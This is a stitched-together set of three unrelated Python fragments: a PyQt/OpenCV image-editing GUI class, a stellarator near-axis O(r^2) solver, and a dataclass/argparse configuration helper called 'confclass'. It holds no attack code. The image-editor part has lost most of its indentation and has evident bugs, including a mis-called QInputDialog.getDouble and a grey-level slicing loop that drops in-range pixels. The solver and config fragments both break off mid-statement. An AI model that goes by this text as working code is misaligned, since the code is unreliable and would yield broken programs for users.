filename = QtCore.QStringList()
if (dialog.exec_()):
file_name = dialog.selectedFiles()
plain_text = open(file_name[0]).read()
self.Editor.setPlainText(plain_text)
self.file_path = str(file_name[0])
def graScaleFun(self):
gray_img = cv2.cvtColor(self.global_img, cv2.COLOR_BGR2GRAY)
self.global_img = gray_img
cv2.imwrite('savedImage.jpg', gray_img)
self.image_out.setPixmap(QtGui.QPixmap("savedImage.jpg"))
self.image_out.setScaledContents(True)
def negative_fun(self):
height, width = self.global_img.shape
self.global_img= 255 - self.global_img
negative_img = self.global_img
# Display the negative transformed image
self.displayINlebal()
def getTextForFlip(self):
text, okPressed = QInputDialog.getText(self, "fliping", "type:x or y or xy", QLineEdit.Normal, "")
if okPressed and text != '':
print(text)
return text
def flip_fun(self):
res = self.getTextForFlip()
if res == 'x':
flipedimage = cv2.flip(self.global_img, 0)
elif res == 'y':
flipedimage = cv2.flip(self.global_img, 1)
elif res == 'xy':
flipedimage = cv2.flip(self.global_img, -1)
self.global_img = flipedimage
self.displayINlebal()
return flipedimage
def getAngle(self):
angle, okPressed = QInputDialog.getDouble(self, "Get double", "Value:", 10.05, -360, 360, 10)
if okPressed:
print(angle)
return angle
def rotate_fun(self):
angle = self.getAngle()
rotated = imutils.rotate_bound(self.global_img, angle)
self.global_img = rotated
self.displayINlebal()
    def skewing_fun(self):
        """Apply an affine skew chosen interactively by the user.

        Three source corners (top-left, top-right, bottom-left) are mapped to
        user-supplied destinations and the image is warped accordingly.
        NOTE(review): the dialogs mix up rows and columns (shape[0] is rows
        but is used for x limits) and the two commented-out inputs (b2, c2)
        suggest the destination triangle was simplified -- confirm intended
        geometry before changing anything.
        """
        # Destination of the 1st corner (a1, a2); the remaining inputs only
        # provide one coordinate each, the other is fixed below.
        a1, okPressed = QInputDialog.getDouble(self, "enter skewing destnation", "x value 1st point:", 0.0, -self.global_img.shape[0], self.global_img.shape[0], 1)
        a2, okPressed = QInputDialog.getDouble(self, "enter skewing destnation", "y value 1st point:", 0.0, -self.global_img.shape[1], self.global_img.shape[1], 1)
        b1, okPressed = QInputDialog.getDouble(self, "enter skewing destnation", "x value 2nd point:", 0.0, -self.global_img.shape[0], self.global_img.shape[0], 1)
        #b2, okPressed = QInputDialog.getDouble(self, "enter skewing destnation", "y value 2nd point:", 0.0, -self.global_img.shape[1], self.global_img.shape[1], 1)
        c1, okPressed = QInputDialog.getDouble(self, "enter skewing destnation", "x value 3rd point:", 0.0, -self.global_img.shape[0], self.global_img.shape[0], 1)
        #c2, okPressed = QInputDialog.getDouble(self, "enter skewing destnation", "y value 3rd point:", 0.0, -self.global_img.shape[1], self.global_img.shape[1], 1)
        image = self.global_img
        # Source triangle: three corners of the image.
        src_pts = np.float32([[0, 0], [image.shape[0] - 1, 0], [0, image.shape[1] - 1]])
        # Destination triangle built from the user's inputs.
        dst_pts = np.float32([[a1, a2], [image.shape[0]+b1, 0], [c1, image.shape[1]]])
        Mat = cv2.getAffineTransform(src_pts, dst_pts)
        skewed = cv2.warpAffine(image, Mat, (image.shape[1], image.shape[0]))
        self.global_img = skewed
        self.displayINlebal()
def crop_fun(self):
a1, okPressed = QInputDialog.getInt(self, "enter croping points", "from row number:", 0, -self.global_img.shape[0], self.global_img.shape[0], 1)
a2, okPressed = QInputDialog.getInt(self, "enter croping points", "to row number:", 0, -self.global_img.shape[1], self.global_img.shape[1], 1)
b1, okPressed = QInputDialog.getInt(self, "enter croping points", "from col number:", 0, -self.global_img.shape[0], self.global_img.shape[0], 1)
b2, okPressed = QInputDialog.getInt(self, "enter croping points", "to col number:", 0, -self.global_img.shape[1], self.global_img.shape[1], 1)
self.global_img = self.global_img[a1:a2, b1:b2]
self.displayINlebal()
cv2.imshow("Cropped Image", self.global_img)
cv2.waitKey(0)
def scaling_fun(self):
scaleX, okPressed = QInputDialog.getInt(self, "Get scaling value", "fx Value:", 1, -self.global_img.shape[0], self.global_img.shape[0], 1)
scaleY, okPressed = QInputDialog.getInt(self, "Get scaling value", "fy Value:", 1, -self.global_img.shape[1], self.global_img.shape[1], 1)
img = self.global_img
# Reduce the image to 0.6 times the original
scaled_img = cv2.resize(img, None, fx=scaleX, fy=scaleY, interpolation=cv2.INTER_LINEAR)
self.global_img = scaled_img
self.displayINlebal()
cv2.imshow("Scaled Image", self.global_img)
cv2.waitKey(0)
def histequ_fun(self):
equ = cv2.equalizeHist(self.global_img)
self.global_img = equ
self.displayINlebal()
def trans_fun(self):
# Store height and width of the image
gray_img = self.global_img
height, width = gray_img.shape[:2]
transX, okPressed = QInputDialog.getInt(self, "Get translation value", "x Value:", 1, -self.global_img.shape[0],self.global_img.shape[0], 1)
transY, okPressed = QInputDialog.getInt(self, "Get translation value", "y Value:", 1, -self.global_img.shape[1],self.global_img.shape[1], 1)
T = np.float32([[1, 0, transX], [0, 1, transY]])
# We use warpAffine to transform
# the image using the matrix, T
trans_img = cv2.warpAffine(gray_img, T, (width, height))
self.global_img = trans_img
self.displayINlebal()
def blend_fun(self):
factor1, okPressed = QInputDialog.getDouble(self, "1st image factor:", 0.5, 0.0, 1, 0.1)
factor2, okPressed = QInputDialog.getDouble(self, "2nd image factor:", 0.5, 0.0, 1, 0.1)
flipedimage = cv2.flip(self.global_img, 0)
dst = cv2.addWeighted(flipedimage, factor1, self.global_img, factor2, 0)
self.global_img = dst
self.displayINlebal()
# # Apply log transformation method
def log_fun(self):
c = 255 / np.log(1 + np.max(self.global_img))
log_image = c * (np.log(self.global_img + 1))
log_image = np.array(log_image, dtype=np.uint8)
self.global_img = log_image
self.displayINlebal()
# # gamma correction
def gammacorrection(self):
# Apply gamma correction.
gamma, okPressed = QInputDialog.getDouble(self, "enter gamma value ", "gamma<0 = darker , gamma>0 = lighter ", 0.5, 0, 4, 3)
gamma_corrected = np.array(255 * (self.global_img / 255) ** gamma, dtype='uint8')
self.global_img = gamma_corrected
self.displayINlebal()
def threshold_fun(self):
threshvalue, okPressed = QInputDialog.getDouble(self, "thresholding ", "enter the threshold value:",1, 0, 255, 1)
ret, thresh1 = cv2.threshold(self.global_img, threshvalue, 255, cv2.THRESH_BINARY)
self.global_img = thresh1
self.displayINlebal()
# grey level slicing
def slicing_fun(self):
# Find width and height of image
row, column = self.global_img.shape
# Create an zeros array to store the sliced image
img1 = np.zeros((row, column), dtype='uint8')
# Specify the min and max range
min_range, okPressed = QInputDialog.getInt(self, "slicing data", "min range", 0, 0, 255, 1)
max_range, okPressed = QInputDialog.getInt(self, "slicing data", "max range", 0, 0, 255, 1)
# Loop over the input image and if pixel value lies in desired range set it to 255 otherwise set it to 0.
for i in range(row):
for j in range(column):
if self.global_img[i, j] > max_range:
img1[i, j] = 255
elif self.global_img[i, j] < min_range:
img1[i, j] = 0
# Display the image
self.global_img = img1
self.displayINlebal()
# this function takes the user choice and give him the filter he\she wants
def smoothing_fun(self):
items = ("Gaussian", "Averaging", "circular","pyramidal","cone","median")
item, okPressed = QInputDialog.getItem(self, "choose method", "filter:", items, 0, False)
if okPressed and item:
print(item)
if item == 'Gaussian':
print(item)
if | |
# Source: GitHub (1-10 stars)
"""
This module contains the calculation for the O(r^2) solution
"""
import logging
import numpy as np
from .util import mu0
#logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
def calculate_r2(self):
"""
Compute the O(r^2) quantities.
"""
logger.debug('Calculating O(r^2) terms')
# First, some shorthand:
nphi = self.nphi
B0_over_abs_G0 = self.B0 / np.abs(self.G0)
abs_G0_over_B0 = 1 / B0_over_abs_G0
X1c = self.X1c
Y1s = self.Y1s
Y1c = self.Y1c
sigma = self.sigma
d_d_varphi = self.d_d_varphi
iota_N = self.iotaN
iota = self.iota
curvature = self.curvature
torsion = self.torsion
etabar = self.etabar
B0 = self.B0
G0 = self.G0
I2 = self.I2
B2s = self.B2s
B2c = self.B2c
p2 = self.p2
sG = self.sG
spsi = self.spsi
I2_over_B0 = self.I2 / self.B0
if np.abs(iota_N) < 1e-8:
print('Warning: |iota_N| is very small so O(r^2) solve will be poorly conditioned. iota_N=', iota_N)
V1 = X1c * X1c + Y1c * Y1c + Y1s * Y1s
V2 = 2 * Y1s * Y1c
V3 = X1c * X1c + Y1c * Y1c - Y1s * Y1s
factor = - B0_over_abs_G0 / 8;
Z20 = factor*np.matmul(d_d_varphi,V1)
Z2s = factor*(np.matmul(d_d_varphi,V2) - 2 * iota_N * V3)
Z2c = factor*(np.matmul(d_d_varphi,V3) + 2 * iota_N * V2)
qs = -iota_N * X1c - Y1s * torsion * abs_G0_over_B0
qc = np.matmul(d_d_varphi,X1c) - Y1c * torsion * abs_G0_over_B0
rs = np.matmul(d_d_varphi,Y1s) - iota_N * Y1c
rc = np.matmul(d_d_varphi,Y1c) + iota_N * Y1s + X1c * torsion * abs_G0_over_B0
X2s = B0_over_abs_G0 * (np.matmul(d_d_varphi,Z2s) - 2*iota_N*Z2c + B0_over_abs_G0 * ( abs_G0_over_B0*abs_G0_over_B0*B2s/B0 + (qc * qs + rc * rs)/2)) / curvature
X2c = B0_over_abs_G0 * (np.matmul(d_d_varphi,Z2c) + 2*iota_N*Z2s - B0_over_abs_G0 * (-abs_G0_over_B0*abs_G0_over_B0*B2c/B0 \
+ abs_G0_over_B0*abs_G0_over_B0*etabar*etabar/2 - (qc * qc - qs * qs + rc * rc - rs * rs)/4)) / curvature
beta_1s = -4 * spsi * sG * mu0 * p2 * etabar * abs_G0_over_B0 / (iota_N * B0 * B0)
Y2s_from_X20 = -sG * spsi * curvature * curvature / (etabar * etabar)
Y2s_inhomogeneous = sG * spsi * (-curvature/2 + curvature*curvature/(etabar*etabar)*(-X2c + X2s * sigma))
Y2c_from_X20 = -sG * spsi * curvature * curvature * sigma / (etabar * etabar)
Y2c_inhomogeneous = sG * spsi * curvature * curvature / (etabar * etabar) * (X2s + X2c * sigma)
# Note: in the fX* and fY* quantities below, I've omitted the
# contributions from X20 and Y20 to the d/dzeta terms. These
# contributions are handled later when we assemble the large
# matrix.
fX0_from_X20 = -4 * sG * spsi * abs_G0_over_B0 * (Y2c_from_X20 * Z2s - Y2s_from_X20 * Z2c)
fX0_from_Y20 = -torsion * abs_G0_over_B0 - 4 * sG * spsi * abs_G0_over_B0 * (Z2s) \
- spsi * I2_over_B0 * (-2) * abs_G0_over_B0
fX0_inhomogeneous = curvature * abs_G0_over_B0 * Z20 - 4 * sG * spsi * abs_G0_over_B0 * (Y2c_inhomogeneous * Z2s - Y2s_inhomogeneous * Z2c) \
- spsi * I2_over_B0 * (0.5 * curvature * sG * spsi) * abs_G0_over_B0 + beta_1s * abs_G0_over_B0 / 2 * Y1c
fXs_from_X20 = -torsion * abs_G0_over_B0 * Y2s_from_X20 - 4 * spsi * sG * abs_G0_over_B0 * (Y2c_from_X20 * Z20) \
- spsi * I2_over_B0 * (- 2 * Y2s_from_X20) * abs_G0_over_B0
fXs_from_Y20 = - 4 * spsi * sG * abs_G0_over_B0 * (-Z2c + Z20)
fXs_inhomogeneous = np.matmul(d_d_varphi,X2s) - 2 * iota_N * X2c - torsion * abs_G0_over_B0 * Y2s_inhomogeneous + curvature * abs_G0_over_B0 * Z2s \
- 4 * spsi * sG * abs_G0_over_B0 * (Y2c_inhomogeneous * Z20) \
- spsi * I2_over_B0 * (0.5 * curvature * spsi * sG - 2 * Y2s_inhomogeneous) * abs_G0_over_B0 \
- (0.5) * abs_G0_over_B0 * beta_1s * Y1s
fXc_from_X20 = - torsion * abs_G0_over_B0 * Y2c_from_X20 - 4 * spsi * sG * abs_G0_over_B0 * (-Y2s_from_X20 * Z20) \
- spsi * I2_over_B0 * (- 2 * Y2c_from_X20) * abs_G0_over_B0
fXc_from_Y20 = - torsion * abs_G0_over_B0 - 4 * spsi * sG * abs_G0_over_B0 * (Z2s) \
- spsi * I2_over_B0 * (-2) * abs_G0_over_B0
fXc_inhomogeneous = np.matmul(d_d_varphi,X2c) + 2 * iota_N * X2s - torsion * abs_G0_over_B0 * Y2c_inhomogeneous + curvature * abs_G0_over_B0 * Z2c \
- 4 * spsi * sG * abs_G0_over_B0 * (-Y2s_inhomogeneous * Z20) \
- spsi * I2_over_B0 * (0.5 * curvature * sG * spsi - 2 * Y2c_inhomogeneous) * abs_G0_over_B0 \
- (0.5) * abs_G0_over_B0 * beta_1s * Y1c
fY0_from_X20 = torsion * abs_G0_over_B0 - spsi * I2_over_B0 * (2) * abs_G0_over_B0
fY0_from_Y20 = np.zeros(nphi)
fY0_inhomogeneous = -4 * spsi * sG * abs_G0_over_B0 * (X2s * Z2c - X2c * Z2s) \
- spsi * I2_over_B0 * (-0.5 * curvature * X1c * X1c) * abs_G0_over_B0 - (0.5) * abs_G0_over_B0 * beta_1s * X1c
fYs_from_X20 = -2 * iota_N * Y2c_from_X20 - 4 * spsi * sG * abs_G0_over_B0 * (Z2c)
fYs_from_Y20 = np.full(nphi, -2 * iota_N)
fYs_inhomogeneous = np.matmul(d_d_varphi,Y2s_inhomogeneous) - 2 * iota_N * Y2c_inhomogeneous + torsion * abs_G0_over_B0 * X2s \
- 4 * spsi * sG * abs_G0_over_B0 * (-X2c * Z20) - 2 * spsi * I2_over_B0 * X2s * abs_G0_over_B0
fYc_from_X20 = 2 * iota_N * Y2s_from_X20 - 4 * spsi * sG * abs_G0_over_B0 * (-Z2s)
fYc_from_Y20 = np.zeros(nphi)
fYc_inhomogeneous = np.matmul(d_d_varphi,Y2c_inhomogeneous) + 2 * iota_N * Y2s_inhomogeneous + torsion * abs_G0_over_B0 * X2c \
- 4 * spsi * sG * abs_G0_over_B0 * (X2s * Z20) \
- spsi * I2_over_B0 * (-0.5 * curvature * X1c * X1c + 2 * X2c) * abs_G0_over_B0 + 0.5 * abs_G0_over_B0 * beta_1s * X1c
matrix = np.zeros((2 * nphi, 2 * nphi))
right_hand_side = np.zeros(2 * nphi)
for j in range(nphi):
# Handle the terms involving d X_0 / d zeta and d Y_0 / d zeta:
# ----------------------------------------------------------------
# Equation 1, terms involving X0:
# Contributions arise from Y1c * fYs - Y1s * fYc.
matrix[j, 0:nphi] = Y1c[j] * d_d_varphi[j, :] * Y2s_from_X20 - Y1s[j] * d_d_varphi[j, :] * Y2c_from_X20
# Equation 1, terms involving Y0:
# Contributions arise from -Y1s * fY0 - Y1s * fYc, and they happen to be equal.
matrix[j, nphi:(2*nphi)] = -2 * Y1s[j] * d_d_varphi[j, :]
# Equation 2, terms involving X0:
# Contributions arise from -X1c * fX0 + Y1s * fYs + Y1c * fYc
matrix[j+nphi, 0:nphi] = -X1c[j] * d_d_varphi[j, :] + Y1s[j] * d_d_varphi[j, :] * Y2s_from_X20 + Y1c[j] * d_d_varphi[j, :] * Y2c_from_X20
# Equation 2, terms involving Y0:
# Contributions arise from -Y1c * fY0 + Y1c * fYc, but they happen to cancel.
# Now handle the terms involving X_0 and Y_0 without d/dzeta derivatives:
# ----------------------------------------------------------------
matrix[j, j ] = matrix[j, j ] + X1c[j] * fXs_from_X20[j] - Y1s[j] * fY0_from_X20[j] + Y1c[j] * fYs_from_X20[j] - Y1s[j] * fYc_from_X20[j]
matrix[j, j + nphi] = matrix[j, j + nphi] + X1c[j] * fXs_from_Y20[j] - Y1s[j] * fY0_from_Y20[j] + Y1c[j] * fYs_from_Y20[j] - Y1s[j] * fYc_from_Y20[j]
matrix[j + nphi, j ] = matrix[j + nphi, j ] - X1c[j] * fX0_from_X20[j] + X1c[j] * fXc_from_X20[j] - Y1c[j] * fY0_from_X20[j] + Y1s[j] * fYs_from_X20[j] + Y1c[j] * fYc_from_X20[j]
matrix[j + nphi, j + nphi] = matrix[j + nphi, j + nphi] - X1c[j] * fX0_from_Y20[j] + X1c[j] * fXc_from_Y20[j] - Y1c[j] * fY0_from_Y20[j] + Y1s[j] * fYs_from_Y20[j] + Y1c[j] * fYc_from_Y20[j]
right_hand_side[0:nphi] = -(X1c * fXs_inhomogeneous - Y1s * fY0_inhomogeneous + Y1c * fYs_inhomogeneous - Y1s * fYc_inhomogeneous)
right_hand_side[nphi:2 * nphi] = -(- X1c * fX0_inhomogeneous + X1c * fXc_inhomogeneous - Y1c * fY0_inhomogeneous + Y1s * fYs_inhomogeneous + Y1c * fYc_inhomogeneous)
solution = np.linalg.solve(matrix, right_hand_side)
X20 = solution[0:nphi]
Y20 = solution[nphi:2 * nphi]
# Now that we have X20 and Y20 explicitly, we can reconstruct Y2s, Y2c, and B20:
Y2s = Y2s_inhomogeneous + Y2s_from_X20 * X20
Y2c = Y2c_inhomogeneous + Y2c_from_X20 * X20 + Y20
B20 = B0 * (curvature * X20 - | |
import typing
from typing import Optional, Callable, Iterable, Iterator, Dict, Union
import dataclasses
import argparse
from functools import partial
import yaml
import os
__all__ = [
'confclass',
'confparam'
]
# A sentinel object to detect if a parameter is supplied or not.
# Use an empty class to give it a unique representation.
class _UNSET_TYPE:
    """Type of the `_UNSET` sentinel used to detect unset parameters.

    Copying returns the same instance so the sentinel remains a unique
    singleton even through `copy.copy()` / `copy.deepcopy()` (identity
    comparisons with `is` keep working on copies of containing objects).
    """
    def __copy__(self):
        return self
    def __deepcopy__(self, memo=None):
        # Fix: the original declared the unused memo dict as a mutable
        # default argument (`memodict={}`) -- the classic shared-default
        # pitfall; `None` is the safe sentinel default.
        return self
_UNSET = _UNSET_TYPE()
class _CONFCLASS_MARK_TYPE:
    """Type of the `_CONFCLASS_MARK` sentinel that tags confclass-decorated
    classes; copying preserves identity so `is` checks survive deep copies.
    """
    def __copy__(self):
        return self
    def __deepcopy__(self, memo=None):
        # Fix: the original declared the unused memo dict as a mutable
        # default argument (`memodict={}`); `None` is the safe default.
        return self
_CONFCLASS_MARK = _CONFCLASS_MARK_TYPE()
class DefaultBoolean:
    """
    Boolean wrapper that marks its value as an *unset default fallback*,
    so code can tell "explicitly set to False" apart from "defaulted to
    False" (see `DefaultBoolean.is_default`). Truth-testing an instance
    yields the wrapped value.
    """
    def __init__(self, val: bool = False):
        self.val = val
    def __bool__(self):
        # Delegate truthiness to the wrapped boolean.
        return self.val
    @classmethod
    def is_default(cls, val):
        """True iff `val` is still a wrapped (i.e. defaulted) boolean."""
        return isinstance(val, DefaultBoolean)
def _add_arg_prefix_to_arg_name(arg_name: str, arg_prefix: Optional[str] = None):
    """Insert `arg_prefix` right after the leading dashes of `arg_name`.

    E.g. ('--foo', 'sub') -> '--sub--foo'. With an empty/None prefix the
    name is returned unchanged.
    """
    if not arg_prefix:
        return arg_name
    stripped = arg_name.lstrip('-')
    # Everything removed by lstrip('-') was dashes, so the original
    # dash run is exactly the removed-length prefix.
    dashes = '-' * (len(arg_name) - len(stripped))
    return f'{dashes}{arg_prefix}--{stripped}'
def _is_confclass(cls_or_instance):
    """Return True iff the class/instance was marked by the @confclass decorator."""
    # getattr with a default folds the original hasattr+getattr pair into
    # one lookup; None can never be the mark sentinel.
    mark = getattr(cls_or_instance, '__is_confclass', None)
    return mark is _CONFCLASS_MARK
def _union_type_check(possible_types: Iterable[type], value: object) -> object:
    """Cast `value` to the first of `possible_types` that accepts it.

    Used as an argparse `type=` callable for Union-annotated parameters.

    Fix: the original re-raised on the FIRST failing candidate, so a later
    candidate in the union could never be tried (e.g. Union[int, float] with
    "3.5" failed instead of returning 3.5). Failures are now collected and
    an ArgumentTypeError is raised only when every candidate rejects the
    value.

    :raises argparse.ArgumentTypeError: when no candidate type accepts `value`.
    """
    errors = []
    for _type_candidate in possible_types:
        try:
            return _type_candidate(value)
        except Exception as e:
            errors.append(e)
    raise argparse.ArgumentTypeError(
        f'Value {value!r} does not match any of the expected types; errors: {errors}')
# Concrete collection origins we know how to build from an argparse value.
_collection_types = {list, tuple, set, frozenset}  # dict, OrderedDict
def _collection_type_check(_collection_type: type, _items_types, value: object) -> object:
    """Cast `value` into the given concrete collection type.

    `_items_types` is accepted for future per-item validation.
    """
    # TODO: fully implement and check this function.
    assert _collection_type in _collection_types
    converted = _collection_type(value)
    return converted
def _typing_type_to_argparse_add_argument_kwargs(_type: type) -> Dict:
    """Translate a (possibly generic) annotation into `add_argument()` kwargs.

    Plain types map to `type=`; `bool` maps to a `store_true` flag;
    `Optional[X]` marks the argument non-required with a None default;
    other Unions get a combined cast callable; supported collection
    generics get a collection-building cast.
    """
    # TODO: fully implement and check this function.
    if not isinstance(_type, typing._GenericAlias):
        # Non-generic annotation: either a flag or a direct cast.
        if _type is bool:
            return {'action': 'store_true'}
        return {'type': _type}
    if _type.__origin__ is typing.Union:
        kwargs = {}
        if type(None) in _type.__args__:
            # Optional[...] -- the argument may be omitted entirely.
            kwargs['required'] = False
            kwargs['default'] = None
        possible_types = [tp for tp in _type.__args__ if tp is not type(None)]
        assert len(possible_types) > 0
        if len(possible_types) == 1:
            kwargs.update(_typing_type_to_argparse_add_argument_kwargs(possible_types[0]))
        else:
            kwargs['type'] = partial(_union_type_check, possible_types)
        return kwargs
    if _type.__origin__ in _collection_types:
        # FIXME: how does `argparse` expect to get list?
        # maybe we just should set `type` to be the item type and set `nargs` to "?" or "+"?
        return {'type': partial(_collection_type_check, _type.__origin__, _type.__args__)}
    raise ValueError(f'Type `{_type}` is not supported by `confclass`.')
class ConfParam(dataclasses.Field):
description: Optional[str] = None
default_as_other_field: Optional[str] = None
default_factory_with_self_access: Optional[Callable] = None
choices: Optional[Iterable] = None
def __init__(self,
default=dataclasses.MISSING,
default_factory=dataclasses.MISSING,
init=True,
repr=True,
hash=None,
compare=True,
metadata=None,
description: Optional[str] = None,
default_as_other_field: Optional[str] = None,
default_factory_with_self_access: Optional[Callable] = None,
default_description: Optional[str] = None,
init_from_arg: Union[DefaultBoolean, bool] = DefaultBoolean(False),
arg_names: Optional[Iterable[str]] = None,
arg_prefix: Optional[str] = None,
choices: Optional[Iterable] = None):
self.description = description
self.default_as_other_field = default_as_other_field
self.default_factory_with_self_access = default_factory_with_self_access
self.default_description = default_description
self._arg_names = tuple(arg_names) if arg_names is not None else None
self.arg_prefix = arg_prefix
# Notice: In the line below it is important that `init_from_arg` is the last, so it would stay DefaultBoolean
# when everything else is False.
self.init_from_arg = bool(self._arg_names) or bool(self.arg_prefix) or init_from_arg
self.choices = list(choices) if choices is not None else None
if default_as_other_field is not None and default_factory_with_self_access is not None:
raise ValueError('Cannot set both `default_as_other_field` and `default_factory_with_self_access`.')
if default_as_other_field is not None or default_factory_with_self_access is not None:
if default is not dataclasses.MISSING or default_factory is not dataclasses.MISSING:
raise ValueError(
'Cannot set both `default` nor `default_factory` together with `default_as_other_field`'
'or with `default_factory_with_self_access`.')
# We initially set the `field.default` to an unique `_UNSET` value, which we later detect
# as the field value and re-assign a new value to this field.
default = _UNSET
super(ConfParam, self).__init__(
default=default, default_factory=default_factory, init=init,
repr=repr, hash=hash, compare=compare, metadata=metadata)
def get_arg_names(self, argname_prefix: Optional[str] = None):
arg_names = self._arg_names
if not arg_names:
arg_names = (f"--{self.name.replace('_', '-')}",)
if argname_prefix is None or len(argname_prefix) == 0:
return arg_names
return tuple(_add_arg_prefix_to_arg_name(arg_name, argname_prefix) for arg_name in arg_names)
def add_to_argparser(self, argparser: argparse.ArgumentParser, argname_prefix: Optional[str] = None):
if _is_confclass(self.type):
confclass = self.type
total_argname_prefix = None
if argname_prefix and self.arg_prefix:
total_argname_prefix = argname_prefix + '-' + self.arg_prefix
elif argname_prefix and not self.arg_prefix:
total_argname_prefix = argname_prefix
elif not argname_prefix and self.arg_prefix:
total_argname_prefix = self.arg_prefix
confclass.add_args_to_argparser(argparser, total_argname_prefix)
else:
arg_kwargs = {}
arg_names = self.get_arg_names(argname_prefix)
if self.is_arg_positional:
arg_kwargs['dest'] = self.get_arg_dest(argname_prefix)
arg_kwargs['required'] = self.is_required_as_arg
if self.description:
arg_kwargs['help'] = self.description
if self.default_description:
arg_kwargs['help'] += f' (default: {self.default_description})'
elif self.default_as_other_field is not None:
arg_kwargs['help'] += f' (default: value of `{self.default_as_other_field}`)'
elif self.default is not dataclasses.MISSING and self.default is not _UNSET:
arg_kwargs['help'] += f' (default: {self.default})'
elif self.default_factory is not dataclasses.MISSING:
arg_kwargs['help'] += f' (default: {self.default_factory()})'
if self.choices is not None:
arg_kwargs['choices'] = self.choices
# TODO: complete the rest of the possible parameters that we should pass here to `add_argument()`
# TODO: for a boolean parameter add `store_true` and `store_false` arguments.
arg_kwargs.update(_typing_type_to_argparse_add_argument_kwargs(self.type))
argparser.add_argument(
*arg_names,
**arg_kwargs)
def load_from_args(self, args: argparse.Namespace, argname_prefix: Optional[str] = None) -> object:
if _is_confclass(self.type):
confclass = self.type
total_argname_prefix = None
if argname_prefix and self.arg_prefix:
total_argname_prefix = argname_prefix + '-' + self.arg_prefix
elif argname_prefix and not self.arg_prefix:
total_argname_prefix = argname_prefix
elif not argname_prefix and self.arg_prefix:
total_argname_prefix = self.arg_prefix
return confclass.load_from_args(args, total_argname_prefix)
else:
arg_dest = self.get_arg_dest(argname_prefix)
if arg_dest in args:
return args.__getattribute__(arg_dest)
return None
def get_arg_dest(self, argname_prefix: Optional[str] = None) -> str:
return self.get_arg_names(argname_prefix)[0].strip('-').replace('-', '_')
@property
def has_default(self):
return self.default is not dataclasses.MISSING or \
self.default_factory is not dataclasses.MISSING or \
self.default_factory_with_self_access is not None or \
self.default_as_other_field is not None
    @property
    def is_arg_positional(self):
        # NOTE(review): despite the name, this returns True when every arg
        # name starts with '-' (an optional/flag-style argument, NOT a
        # positional). add_to_argparser relies on this inverted meaning
        # (argparse only accepts dest/required for optionals) -- confirm
        # before renaming or "fixing" the logic.
        return all(arg_name[0] == '-' for arg_name in self.get_arg_names())
@property
def is_required_as_arg(self):
return self.init_from_arg and not self.has_default
# Lowercase alias so field declarations read like `dataclasses.field()`
# (it is also swapped in for `dataclasses.field` inside `confclass`).
confparam = ConfParam
def confclass(_cls,
frozen: bool = True,
init_all_from_arg_by_default: bool = True,
load_from_yaml_via_arg: bool = True):
# cls_annotations = _cls.__dict__.get('__annotations__', {})
# cls_fields = [dataclasses._get_field(_cls, name, type)
# for name, type in cls_annotations.items()]
# print('_cls annotations:', _cls.__dict__.get('__annotations__', {}))
# class _inh:
# __dict__ = _cls.__dict__
# # __class__ = _cls.__class__
# __annotations__ = _cls.__annotations__
# # a: int
# pass
# print('_cls annotations:', _cls.__dict__.get('__annotations__', {}))
# print('_inh annotations:', _inh.__dict__.get('__annotations__', {}))
# print('_cls __dict__:', _cls.__dict__)
# print('_inh __dict__:', _inh.__dict__)
# _cls = _inh
# print('_inh(_cls) annotations:', _inh.__dict__.get('__annotations__', {}))
# del _inh.__dict__['__annotations__']['a']
# _inh.__dict__['__annotations__'].update(_cls.__dict__.get('__annotations__', {}))
# object.__setattr__(_inh, '__annotations__', _cls.__dict__.get('__annotations__', {}))
# print('_inh(_cls) [after coping annotations from _cls] annotations:', _inh.__dict__.get('__annotations__', {}))
# _cls = _inh
def __set_unset_fields(_self):
for fld in dataclasses.fields(_self):
if not isinstance(fld, ConfParam):
continue
if getattr(_self, fld.name) is not _UNSET:
continue
if fld.default_factory_with_self_access is not None:
new_value = fld.default_factory_with_self_access(_self)
object.__setattr__(_self, fld.name, new_value)
elif fld.default_as_other_field is not None:
assert hasattr(_self, fld.default_as_other_field)
value = getattr(_self, fld.default_as_other_field)
assert value is not _UNSET
object.__setattr__(_self, fld.name, value)
def __verify_fields_values(_self):
pass # TODO: implement!
orig_post_init = getattr(_cls, '__post_init__', None)
def __post_init__(self):
__set_unset_fields(self)
if orig_post_init is not None:
orig_post_init(self)
__verify_fields_values(self)
setattr(_cls, '__post_init__', __post_init__)
# Create a `dataclass()` out of the _cls
# Make sure that auto created fields are from type `ConfParam` rather than `dataclasses.Field`
orig_dataclasses_field_fn = dataclasses.field
dataclasses.field = confparam
_cls = dataclasses.dataclass(_cls, frozen=frozen)
dataclasses.field = orig_dataclasses_field_fn
if init_all_from_arg_by_default:
for fld in dataclasses.fields(_cls):
if not isinstance(fld, ConfParam):
continue
if DefaultBoolean.is_default(fld.init_from_arg):
fld.init_from_arg = True
def _iter_fields_with_args(cls) -> Iterator[ConfParam]:
for fld in dataclasses.fields(cls):
if not isinstance(fld, ConfParam):
continue
if not fld.init_from_arg:
continue
yield fld
setattr(_cls, '_iter_fields_with_args', classmethod(_iter_fields_with_args))
def add_args_to_argparser(cls,
argparser: argparse.ArgumentParser,
argname_prefix: Optional[str] = None):
for fld in _iter_fields_with_args(cls):
fld.add_to_argparser(argparser, argname_prefix)
setattr(_cls, 'add_args_to_argparser', classmethod(add_args_to_argparser))
def _load_from_args(cls,
args: Optional[argparse.Namespace] = None,
argname_prefix: Optional[str] = None) -> dict:
if args is None:
argparser = argparse.ArgumentParser()
cls.add_args_to_argparser(argparser)
args = argparser.parse_args()
kwargs_to_ctor = {}
for fld in _iter_fields_with_args(cls):
value = fld.load_from_args(args, argname_prefix)
if value is not None:
kwargs_to_ctor[fld.name] = value
return kwargs_to_ctor
def load_from_args(cls,
args: Optional[argparse.Namespace] = None,
argname_prefix: Optional[str] = None):
kwargs_to_ctor = _load_from_args(cls, args, argname_prefix)
return cls(**kwargs_to_ctor)
setattr(_cls, 'load_from_args', classmethod(load_from_args))
default_hierarchy_fallback_order = frozenset({'args', 'kwargs', 'yaml'})
def factory(cls,
load_from_args: Union[argparse.Namespace, bool] = False,
load_from_yaml: Union[str, bool] = False,
argname_prefix: Optional[str] = None,
verify_confclass: bool = True,
hierarchy_fallback_order=default_hierarchy_fallback_order,
**explicit_params_to_set):
"""
Default params setting hierarchy fallback:
1. From argument
2. Explicit given as kwargs
3. From yaml
4. Default value
"""
assert set(hierarchy_fallback_order).issubset(default_hierarchy_fallback_order)
# TODO: handle differently confparams which are inner confclasses!
# they should be created iff they (or one of its inner confclasses)
# got a non-default value (from arg, explicit or yaml) for one of its params.
